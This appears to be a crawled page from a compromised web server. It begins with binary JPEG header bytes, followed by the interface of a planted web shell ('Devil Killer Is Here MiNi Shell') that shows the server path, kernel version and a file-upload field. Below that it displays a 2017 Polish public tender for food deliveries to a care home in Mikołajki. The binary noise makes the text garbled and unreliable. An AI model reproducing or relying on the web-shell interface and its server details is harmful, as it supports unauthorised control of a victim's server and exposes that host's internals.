JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170124/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170124/13168-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.arka.itmikolajki.pl' target='_blank'>http://www.arka.itmikolajki.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 13168 - 2017
              z dnia 2017-01-24 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Mikołajki: Dostawa artykułów żywnościowych do Ewangelickiego Domu Opieki ARKA Parafii Ewangelicko-Augsburskiej Św.Trójcy w Mikołajkach<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Dostawy
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Ewangelicki Dom Opieki ARKA Parafii Ewangelicko-Augsburskiej im. Św. Trójcy, krajowy numer identyfikacyjny
              79013343300020, ul.
              Plac Kościelny 
              ,
              11730  
              Mikołajki, woj.
              warmińsko-mazurskie, państwo
              Polska, tel.
              87 4216-811, e-mail
              mi368@wp.pl, faks
              87 4215-049.
              <br />
              Adres strony internetowej (URL): www.arka.itmikolajki.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Inny: Ewangelicki Dom Opieki </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.arka.itmikolajki.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br /><br />
                Adres:
                <br />Plac Koścelny 5a, 11-730 Mikołajki</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Dostawa artykułów żywnościowych do Ewangelickiego Domu Opieki ARKA Parafii Ewangelicko-Augsburskiej Św.Trójcy w Mikołajkach<br /><b>Numer referencyjny: </b><br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                dostawy
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przedmiotem zamówienia jest dostawa artykułów żywnościowych do Ewangelickiego Domu Opieki ARKA Parafii Ewangelicko-Augsburskiej Św.Trójcy w Mikołajkach w okresie od 01 marca 2017 do 28 lutego 2018 roku zgodnie z wykazem zamieszczonym  grupach I-VII.<br /><br /><b>II.5) Główny kod CPV: </b>15811000-6<br /><b> Dodatkowe kody CPV:</b>03110000-5,
                15500000-3,
                03142500-3,
                15100000-9,
                15112000-6,
                15220000-6,
                15980000-1,
                15800000-6,
                15600000-4,
                15300000-1<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data rozpoczęcia: 01/03/2017
                    data zakończenia: 28/02/2018<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie stawia szczególnych warunków.<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający nie stawia szczególnych warunków.<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Zamawiający nie stawia szczególnych warunków.<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  nie
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px"></div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br /><br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px"></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>100</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                nie
              <br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 03/02/2017, godzina: 07:30,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Pieczywo<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Bułka drożdżowa  70g szt-200,Bułka drożdżowa z jabłkiem 100g Szt-1400,Bułka poznańska 90g Szt-14000,Bułka z serem kręcona 80g szt-300,
Bułka maślana 80g Szt-800,Bułka z makiem zawijana 80g Szt-400,
Bułka tarta Kg-130,Chleb razowy krojony 450g szt-1900,
Chleb orkiszowy 500g krojony szt-380,Chleb zwykły krojony 1kg Szt-6700,
Drożdże 500g szt-8, Pączek z marmoladą Szt-400,Ciasto murzynek Kg-25,
Ciasto makowiec Kg-21,Ciasto sernik Kg-10,Pączki serowe Kg-9<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>15811000-6<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 28/02/2018<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Owoce i warzywa<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Ananas szt-5,Arbuz(sezon)kg-260,Banan kg-1330,Bazylia  doniczka Szt-3,
Botwina pęczek szt-70,Brzoskwinie kg-30,Buraki czerwone kg-1000,
Cebula biała kg-800,Cukinia Kg-6,Czosnek główka szt-290,Cytryna Kg-400,
Czereśnie (sezon)Kg-60,Fasola szparagowa kg-60,Gruszki (sezon)Kg-160,
Grejpfrut czerwony Kg-440, Jabłka Kg-1900,Jagody świeże Kg-15,
Kapusta młoda Szt-150,Kapusta biała Kg-690,Kapusta czerwona Kg-150,
Kapusta kwaszona Kg-600, Kapusta pekińska Kg-100,Kalafior Szt-100,
Kiwi szt-1300,Koper pęczek 100g Szt-500,Mak niebieski Kg-2,
Marchew kg-1400,Mandarynka Kg-480,Nektarynka Kg-160,Ogórek świeży Kg-500,
Ogórki małosolne Kg-35,Ogórki kwaszone Kg-280,Por kg-350,
Papryka czerwona kg-130,Pomidory Kg-1000,Pomarańcza Kg-200,
Pietruszka korzeń Kg-10,Pietruszka nać 50g Szt-500,
